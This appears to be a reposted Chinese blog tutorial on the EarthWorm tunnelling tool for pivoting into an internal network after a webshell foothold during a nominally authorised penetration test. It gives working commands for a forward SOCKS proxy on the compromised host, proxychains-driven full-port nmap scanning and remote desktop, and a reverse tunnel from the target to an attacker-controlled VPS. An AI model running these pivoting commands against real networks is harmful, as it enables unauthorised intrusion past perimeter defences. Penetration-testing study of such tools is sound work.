我喜欢SEO、网络营销及建站,希望与志同道合的您
建立合作或相互学习关系 QQ:10343829

EarthWorm 内网代理到本地神器使用方法

当在进行授权的渗透测试的时候,拿下webshell,提权后并不意味着战斗的结束,相反,内网渗透才刚刚开始。

本文主要记录EarthWorm 工具的使用

第一步:下载EarthWorm  工具自己找,这里不提供,下载后是这个样子:

第二步:正向代理使用方法(比较简单,可以考虑使用)

1.  靶机执行 :  ew.exe -s ssocksd -l 8000    

2.  使用: proxifier 本机直接开始代理

3. 好了,代理完成,打开浏览器,百度一下本机ip已经更改了。

4. 如果攻击机为linux 那么客户端代理就是

   (1.)   编辑 /etc/proxychains.conf 

 (2.) 底部加入  192.168.0.111 8000  也就是服务器ip地址   端口

 (3.)  执行  proxychains  nmap 192.168.0.111 -p 1-65535 -T4 -sV -vv  即可扫描端口

            执行   rdesktop 192.168.0.111  即可远程桌面  等命令

第三步:反向代理使用方法

1. 服务端(有独立ip的vps)执行: ew -s rcsocks -l 1080 -e 8888

    监听本地8888端口,然后将靶机传过来的流量交给本地1080端口

2. 靶机执行: ew.exe -s rssocks -d  服务端ip -e 8888

   寻找服务端ip和对应的端口,将流量传过去。

3. 本地 proxifier vps的ip  1080即可链接成功。

 

转载请著名来源:天天小站 » EarthWorm 内网代理到本地神器使用方法

分享到:更多 ()